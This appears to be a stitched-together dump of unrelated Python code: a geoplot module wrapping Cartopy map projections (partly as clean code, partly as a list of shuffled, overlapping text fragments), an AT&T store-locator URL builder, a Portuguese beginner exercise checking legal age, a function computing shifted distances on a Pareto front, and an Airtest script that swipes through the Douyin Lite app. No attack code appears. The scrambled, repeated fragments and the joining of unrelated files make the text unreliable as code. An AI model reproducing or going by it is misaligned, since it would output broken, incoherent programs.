Since we control what ``geoplot`` does at execution,", "---------- proj : geoplot.crs projection instance The instance in question", "self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by", "type(name, (Base,), {}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic',", "to get defaults for our ``df`` and pass them off", "filtered to keys in `self.filter_`.\"\"\" return super().load( df, {key: value", "them; which is, incidentally, the reason behind all of this", "to keys in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load`", "has only a ``central_longitude`` instance parameter, implying that latitude is", "implying that latitude is fixed (as indeed it is, as", "that latitude is fixed (as indeed it is, as this", "what ``geoplot`` does at execution, we gracefully integrate this two-step", "defaults for our ``df`` and pass them off to our", "instance in question (self, in the method body). Returns -------", "functions; each of the projection wrapper classes defined here in", "that every ``cartopy`` coordinate reference system object has one. When", "of Cartopy CRS objects this module derives from, refer to", "be used as parameters to the ``projection`` parameter of all", "must be pre-loaded. It's possible to get around this by", "silently swaps itself out for a vanilla version of its", "Returns ------- Mutates into a ``cartopy.crs`` object and returns the", "proj : geoplot.crs projection instance The instance in question (self,", "to a ``geoplot`` function, the loading and centering of the", "a callable ``as_mpl_axes`` method. The precise details of what this", "the reason behind all of this funny twice-instantiation loading in", "we control what ``geoplot`` does at execution, we gracefully integrate", "calculate reasonable centering variables in cases in which the user", "{}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator',", "it expects to get something with a callable ``as_mpl_axes`` method.", "``cartopy.crs`` objects meant to be used as parameters to the", "longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that", "`load` : Return a Cartopy CRS initialized with defaults from", "latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\", "`load` method with `centerings` filtered to keys in `self.filter_`.\"\"\" return", "user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When", "others lack them. For example, the geospatial projection contains both", "defines the ``geoplot`` coordinate reference system classes, wrappers on ``cartopy.crs``", "method with `centerings` filtered to keys in `self.filter_`.\"\"\" return super().load(", "at execution, we gracefully integrate this two-step procedure into the", "the internals of individual projections' load procedures. Parameters ---------- df", "incidentally, the reason behind all of this funny twice-instantiation loading", "the function body. But there are also use cases outside", "North Pole!). A top-level centerings method is provided in each", "Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name,", "defined immediately above). 
Since we control what ``geoplot`` does at", "only a ``central_longitude`` instance parameter, implying that latitude is fixed", ": Return a Cartopy CRS initialized with defaults from the", "For example, the geospatial projection contains both ``central_longitude`` and ``central_latitude``", "LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI =", "projections have certain centering parameters whilst others lack them. For", "Parameters ---------- `load` : Return a Cartopy CRS initialized with", "``_as_mpl_axes`` on that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict())", "the `centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes` : Return", "user does not already provide them; which is, incidentally, the", "wherever not already provided by the user. \"\"\" return getattr(ccrs,", "loading in the first place. centerings: dict A dictionary containing", "but this is inelegant. This method is a better way:", "this two-step procedure into the function body. But there are", "with `centerings` filtered to keys in `self.filter_`.\"\"\" return super().load( df,", "_as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a projection via a", "argument, it expects to get something with a callable ``as_mpl_axes``", "object instance Returns a ``cartopy.crs`` object instance whose appropriate instance", "\"overall\" projection must be pre-loaded. It's possible to get around", "``cartopy.crs`` object and returns the result of executing ``_as_mpl_axes`` on", "OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,), {}) for name", "out for a vanilla version of its ``cartopy.crs`` mirror, and", "For the list of Cartopy CRS objects this module derives", "dictionary, overridden by initialization parameters. `_as_mpl_axes` : Return the result", "method here. We then in turn execute these functions to", "which together control the center of the plot, while the", "geoplot.crs projection instance The instance in question (self, in the", "crs object to a ``geoplot`` function, the loading and centering", "We then in turn execute these functions to get defaults", "is fixed (as indeed it is, as this projection is", "type(name, (LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller',", "example, the geospatial projection contains both ``central_longitude`` and ``central_latitude`` instance", "the method body). Returns ------- Mutates into a ``cartopy.crs`` object", "= tuple( type(name, (LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical',", "defaults from the `centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes`", "to the ``_generic_load`` method here. We then in turn execute", "with a callable ``as_mpl_axes`` method. 
The precise details of what", "keys in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load` method", "objects meant to be used as parameters to the ``projection``", "'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP', 'OSNI')", "\"\"\"CRS that `load`s with `centering` restricted to keys in `self.filter_`.\"\"\"", "it suffices to know that every ``cartopy`` coordinate reference system", "North Pole Stereo projection has only a ``central_longitude`` instance parameter,", "control the center of the plot, while the North Pole", "way: when a ``geoplot.crs`` object called by ``matplotlib``, it silently", "PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\", "initialization parameters. `_as_mpl_axes` : Return the result of calling cartopy's", "by ``matplotlib``, it silently swaps itself out for a vanilla", "result of executing ``_as_mpl_axes`` on that object instead. \"\"\" proj", "return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted", "NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {}) for name in", "dictionary containing names and centering methods. Certain projections have certain", "The precise details of what this method does, exactly, are", "load procedures. Parameters ---------- df : GeoDataFrame The GeoDataFrame which", "creating a plot containing subplots, the \"overall\" projection must be", "classes, wrappers on ``cartopy.crs`` objects meant to be used as", "value for key, value in centerings.items() if key in self.filter_}", "'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') )", "inelegant. This method is a better way: when a ``geoplot.crs``", "the center of the plot, while the North Pole Stereo", "of the ``geoplot`` top-level plot functions; each of the projection", "parameter of all front-end ``geoplot`` outputs. For the list of", "containing names and centering methods. Certain projections have certain centering", "a better way: when a ``geoplot.crs`` object called by ``matplotlib``,", "each of the ``geoplot`` top-level plot functions; each of the", "method. The precise details of what this method does, exactly,", "ccrs import geopandas as gpd class Base: # TODO: RotatedPole", "LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo", "'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP', 'OSNI') )", "this projection is centered on the North Pole!). A top-level", "import cartopy.crs as ccrs import geopandas as gpd class Base:", "subplots, the \"overall\" projection must be pre-loaded. It's possible to", "The instance in question (self, in the method body). 
Returns", "A top-level centerings method is provided in each of the", "df, centerings): \"\"\"Call `load` method with `centerings` filtered to keys", "centerings.items() if key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a", "proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted to", "\"\"\" import cartopy.crs as ccrs import geopandas as gpd class", "function defined immediately above). Since we control what ``geoplot`` does", "``load``: most prominently, when creating a plot containing subplots, the", "'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\", "return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is", "reasonable centering variables in cases in which the user does", "key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS that", "initialize Cartopy CRSs.\"\"\" self.args = kwargs def load(self, df, centerings):", "relevent to this particular instance and passes them to the", "output ``cartopy.crs`` instance. Returns ------- crs : ``cartopy.crs`` object instance", "been passed as input to the plotter at the top", "\"\"\" This module defines the ``geoplot`` coordinate reference system classes,", "Since we control what ``geoplot`` does at execution, we gracefully", "name. Parameters ---------- `load` : Return a Cartopy CRS initialized", "the ``geoplot`` coordinate reference system classes, wrappers on ``cartopy.crs`` objects", "OSNI = tuple( type(name, (Base,), {}) for name in ('AlbersEqualArea',", "Base: # TODO: RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name* where", "by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\ Mollweide,\\", "reason behind all of this funny twice-instantiation loading in the", "Cartopy CRSs.\"\"\" self.args = kwargs def load(self, df, centerings): \"\"\"", "\"\"\"For a CRS that centers by latitude.\"\"\" filter_ = {'central_latitude'}", "CRS that centers by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\", "in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary',", "This data is needed to calculate reasonable centering variables in", "to get something with a callable ``as_mpl_axes`` method. The precise", "plot containing subplots, the \"overall\" projection must be pre-loaded. It's", "this method does, exactly, are not important: it suffices to", "are not important: it suffices to know that every ``cartopy``", "``cartopy`` coordinate reference system object has one. When we pass", "`load`s with `centering` restricted to keys in `self.filter_`.\"\"\" def load(self,", "and centering methods. Certain projections have certain centering parameters whilst", "'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo')", "key, value in centerings.items() if key in self.filter_} ) class", "off to our output ``cartopy.crs`` instance. 
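
# Note (illustrative, not part of the original module): because of
# `_as_mpl_axes`, an unloaded wrapper can be handed straight to matplotlib
# when laying out subplots. Kept as a comment to avoid importing matplotlib
# at module load:
#
#     import matplotlib.pyplot as plt
#     import geoplot.crs as gcrs
#     ax = plt.subplot(111, projection=gcrs.PlateCarree())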
class Filtering(Base):
    """CRS that `load`s with `centerings` restricted to keys in `self.filter_`."""

    def load(self, df, centerings):
        """Call the `load` method with `centerings` filtered to keys in `self.filter_`."""
        return super().load(
            df,
            {key: value for key, value in centerings.items() if key in self.filter_}
        )


class LongitudeCentering(Filtering):
    """Form a CRS that centers by longitude."""
    filter_ = {'central_longitude'}


class LatitudeCentering(Filtering):
    """Form a CRS that centers by latitude."""
    filter_ = {'central_latitude'}


PlateCarree, \
    LambertCylindrical, \
    Mercator, \
    Miller, \
    Mollweide, \
    Robinson, \
    Sinusoidal, \
    InterruptedGoodeHomolosine, \
    Geostationary, \
    NorthPolarStereo, \
    SouthPolarStereo = tuple(
        type(name, (LongitudeCentering,), {})
        for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller',
                     'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine',
                     'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo')
    )

Gnomonic = type('Gnomonic', (LatitudeCentering,), {})

AlbersEqualArea, \
    AzimuthalEquidistant, \
    LambertConformal, \
    Orthographic, \
    Stereographic, \
    TransverseMercator, \
    LambertAzimuthalEqualArea, \
    UTM, \
    OSGB, \
    EuroPP, \
    OSNI = tuple(
        type(name, (Base,), {})
        for name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal',
                     'Orthographic', 'Stereographic', 'TransverseMercator',
                     'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP', 'OSNI')
    )
centerings: dict A dictionary containing names and centering methods.", "AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\", "Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,), {}) for name", "cartopy's ``_as_mpl_axes`` for `self.load` called with empty `df` and `centerings`.", "result of calling cartopy's ``_as_mpl_axes`` for `self.load` called with empty", "cases in which the user does not already provide them;", "are also use cases outside of our control in which", "our control in which we are forced to pass a", "centered on the North Pole!). A top-level centerings method is", "does not already provide them; which is, incidentally, the reason", "does at execution, we gracefully integrate this two-step procedure into", "called by ``matplotlib``, it silently swaps itself out for a", "get defaults for our ``df`` and pass them off to", "the plot, while the North Pole Stereo projection has only", "instance. Returns ------- crs : ``cartopy.crs`` object instance Returns a", "``geoplot.crs`` crs object to a ``geoplot`` function, the loading and", "(self, in the method body). Returns ------- Mutates into a", "refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import geopandas", "for `self.load` called with empty `df` and `centerings`. \"\"\" def", "itself out for a vanilla version of its ``cartopy.crs`` mirror,", "the \"overall\" projection must be pre-loaded. It's possible to get", "selects the functions from this list relevent to this particular", "projection via a ``projection`` keyword argument, it expects to get", "Pole Stereo projection has only a ``central_longitude`` instance parameter, implying" ]
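# A minimal usage sketch of the wrappers above, assuming the module is importable
# as ``geoplot.crs`` (its home in the geoplot package); the empty GeoDataFrame
# stands in for real plot input. It shows the twice-instantiation described in
# ``Base.load``: the wrapper is cheap to build, and only ``load`` produces the
# real ``cartopy.crs`` object.
import geopandas as gpd
import geoplot.crs as gcrs

proj = gcrs.PlateCarree(central_longitude=10)  # lightweight wrapper; no cartopy object yet
crs = proj.load(gpd.GeoDataFrame(), {'central_longitude': 0})
# ``crs`` is now a genuine cartopy.crs.PlateCarree. The constructor argument (10)
# wins over the centering default (0) because ``load`` merges self.args last.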
[ "ne_corner = \"{0},{1}\".format(lat + 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat,", "get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner =", "StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler,", "**kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat", "float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon", "= \"{0},{1}\".format(lat + 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon,", "def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner", "1) ne_corner = \"{0},{1}\".format(lat + 1, lon + 1) return", "\"{0},{1}\".format(lat + 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon, sw_corner=sw_corner,", "+ 1, lon + 1) return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon, sw_corner=sw_corner, ne_corner=ne_corner)", "sw_corner = \"{0},{1}\".format(lat - 1, lon - 1) ne_corner =", "- 1) ne_corner = \"{0},{1}\".format(lat + 1, lon + 1)", "def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self,", "lon - 1) ne_corner = \"{0},{1}\".format(lat + 1, lon +", "'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat'))", "handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs):", "lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon -", "float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon - 1) ne_corner", "import StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return", "ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def", "from .default_handler import StoresHandler class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider':", "lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat -", "kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat =", "1, lon - 1) ne_corner = \"{0},{1}\".format(lat + 1, lon", "class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'}) return super(ATTStoresHandler, self).handle_request(**kwargs)", "= float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1,", "= \"{0},{1}\".format(lat - 1, lon - 1) ne_corner = \"{0},{1}\".format(lat", "return super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon", "**kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat", "self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon = float(kwargs.get('lon'))", "\"{0},{1}\".format(lat - 1, lon - 1) ne_corner = \"{0},{1}\".format(lat +", ".default_handler import StoresHandler 
class ATTStoresHandler(StoresHandler): def handle_request(self, **kwargs): kwargs.update({'provider': 'att'})", "super(ATTStoresHandler, self).handle_request(**kwargs) def get_url(self, **kwargs): lat = float(kwargs.get('lat')) lon =", "= float(kwargs.get('lon')) sw_corner = \"{0},{1}\".format(lat - 1, lon - 1)", "- 1, lon - 1) ne_corner = \"{0},{1}\".format(lat + 1," ]
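# A hedged sketch of how ``get_url`` expands a point into a two-degree bounding
# box. The shape of the ``config`` mapping is inferred from the attribute access
# above; the URL template is hypothetical, and the bare constructor call assumes
# StoresHandler needs no arguments.
handler = ATTStoresHandler()
handler.config = {
    'att': {'url': 'https://example.com/stores?sw={sw_corner}&ne={ne_corner}'}
}
print(handler.get_url(provider='att', lat='40.5', lon='-74.0'))
# -> https://example.com/stores?sw=39.5,-75.0&ne=41.5,-73.0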
[ "o ano de nascimento de 7 pessoas e mostre quantas", "e quantas ainda não for c in range(1,8): p=int(input('Qual o", "e mostre quantas ja atingiram a maioridade e quantas ainda", "else: print('A pessoa numero {} não é maior de idade!'.format(c))", "ano de nascimento de 7 pessoas e mostre quantas ja", "nascimento? ')) a=2021-p if a>= 18: print('A pessoa numero {}", "7 pessoas e mostre quantas ja atingiram a maioridade e", "for c in range(1,8): p=int(input('Qual o ano de seu nascimento?", "idade'.format(c)) else: print('A pessoa numero {} não é maior de", "pessoas e mostre quantas ja atingiram a maioridade e quantas", "já é maior de idade'.format(c)) else: print('A pessoa numero {}", "mostre quantas ja atingiram a maioridade e quantas ainda não", "#Leia o ano de nascimento de 7 pessoas e mostre", "{} já é maior de idade'.format(c)) else: print('A pessoa numero", "')) a=2021-p if a>= 18: print('A pessoa numero {} já", "print('A pessoa numero {} já é maior de idade'.format(c)) else:", "ja atingiram a maioridade e quantas ainda não for c", "seu nascimento? ')) a=2021-p if a>= 18: print('A pessoa numero", "de 7 pessoas e mostre quantas ja atingiram a maioridade", "c in range(1,8): p=int(input('Qual o ano de seu nascimento? '))", "maioridade e quantas ainda não for c in range(1,8): p=int(input('Qual", "a=2021-p if a>= 18: print('A pessoa numero {} já é", "de nascimento de 7 pessoas e mostre quantas ja atingiram", "pessoa numero {} já é maior de idade'.format(c)) else: print('A", "if a>= 18: print('A pessoa numero {} já é maior", "in range(1,8): p=int(input('Qual o ano de seu nascimento? ')) a=2021-p", "p=int(input('Qual o ano de seu nascimento? ')) a=2021-p if a>=", "18: print('A pessoa numero {} já é maior de idade'.format(c))", "o ano de seu nascimento? ')) a=2021-p if a>= 18:", "atingiram a maioridade e quantas ainda não for c in", "ano de seu nascimento? ')) a=2021-p if a>= 18: print('A", "range(1,8): p=int(input('Qual o ano de seu nascimento? ')) a=2021-p if", "não for c in range(1,8): p=int(input('Qual o ano de seu", "a maioridade e quantas ainda não for c in range(1,8):", "quantas ainda não for c in range(1,8): p=int(input('Qual o ano", "ainda não for c in range(1,8): p=int(input('Qual o ano de", "quantas ja atingiram a maioridade e quantas ainda não for", "é maior de idade'.format(c)) else: print('A pessoa numero {} não", "nascimento de 7 pessoas e mostre quantas ja atingiram a", "de seu nascimento? ')) a=2021-p if a>= 18: print('A pessoa", "de idade'.format(c)) else: print('A pessoa numero {} não é maior", "a>= 18: print('A pessoa numero {} já é maior de", "numero {} já é maior de idade'.format(c)) else: print('A pessoa", "maior de idade'.format(c)) else: print('A pessoa numero {} não é" ]
[ "= [] for j in front: if i == j:", "\"\"\" Provide function to calculate SDE distance @auth: <NAME> @date:", "[(values1[i], values2[i])] shifted_list = [] for j in front: if", "j in front: if i == j: continue else: shifted_list.append((min(values1[i],", "i in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list = []", "== j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j]))) shifted_dict[i].append(shifted_list) return", "to calculate SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\" def", "calculate SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front,", "def SDE(front, values1, values2): shifted_dict = {} for i in", "<NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict =", "shifted_dict = {} for i in front: shifted_dict[i] = [(values1[i],", "2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict = {} for", "coding: utf-8 -*- \"\"\" Provide function to calculate SDE distance", "SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1,", "python3 # -*- coding: utf-8 -*- \"\"\" Provide function to", "for i in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list =", "in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list = [] for", "utf-8 -*- \"\"\" Provide function to calculate SDE distance @auth:", "values1, values2): shifted_dict = {} for i in front: shifted_dict[i]", "shifted_list = [] for j in front: if i ==", "function to calculate SDE distance @auth: <NAME> @date: 2021/05/05 \"\"\"", "front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list = [] for j", "{} for i in front: shifted_dict[i] = [(values1[i], values2[i])] shifted_list", "= {} for i in front: shifted_dict[i] = [(values1[i], values2[i])]", "if i == j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j])))", "Provide function to calculate SDE distance @auth: <NAME> @date: 2021/05/05", "i == j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j]))) shifted_dict[i].append(shifted_list)", "for j in front: if i == j: continue else:", "front: if i == j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i],", "SDE(front, values1, values2): shifted_dict = {} for i in front:", "# -*- coding: utf-8 -*- \"\"\" Provide function to calculate", "@date: 2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict = {}", "\"\"\" def SDE(front, values1, values2): shifted_dict = {} for i", "= [(values1[i], values2[i])] shifted_list = [] for j in front:", "-*- \"\"\" Provide function to calculate SDE distance @auth: <NAME>", "#!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Provide function", "values2): shifted_dict = {} for i in front: shifted_dict[i] =", "[] for j in front: if i == j: continue", "distance @auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1, values2):", "values2[i])] shifted_list = [] for j in front: if i", "@auth: <NAME> @date: 2021/05/05 \"\"\" def SDE(front, values1, values2): shifted_dict", "j: continue else: shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j]))) shifted_dict[i].append(shifted_list) return shifted_dict", "in front: if i == j: continue else: shifted_list.append((min(values1[i], values1[j]),", "shifted_dict[i] = [(values1[i], values2[i])] shifted_list = [] for j in", "-*- coding: utf-8 -*- \"\"\" Provide function to calculate SDE" ]
[ "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0", "* if not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) #", "resolution=(1079, 2340))) sleep(5) swipe((484, 1711),(531,709)) print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate", "1: hua += 1 滑动方向 += 1 if hua ==", "import * from airtest.cli.parser import cli_setup # from douyin import", "-*- encoding=utf8 -*- __author__ = \"pscly\" from airtest.core.api import *", "cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\")", "-*- __author__ = \"pscly\" from airtest.core.api import * from airtest.cli.parser", "not cli_setup(): auto_setup(__file__, logdir=True, devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content", "import cli_setup # from douyin import * if not cli_setup():", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") # generate html report # from airtest.report.report import simple_report", "\"pscly\" from airtest.core.api import * from airtest.cli.parser import cli_setup #", "devices=[ \"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") wake() # 启动手机 start_app(\"com.ss.android.ugc.aweme.lite\") hua = 0 滑动方向 =", "= 0 滑动方向 = 0 while 1: hua += 1", "from airtest.cli.parser import cli_setup # from douyin import * if", "0 while 1: hua += 1 滑动方向 += 1 if", "1 if hua == 10: touch(Template(r\"tpl1607564875731.png\", record_pos=(-0.404, -0.67), resolution=(1079, 2340)))", "= \"pscly\" from airtest.core.api import * from airtest.cli.parser import cli_setup", "\"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH\", ]) # script content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\")", "content print(\"start...\") print(\"冲冲冲!\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") print(\"-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=\") 
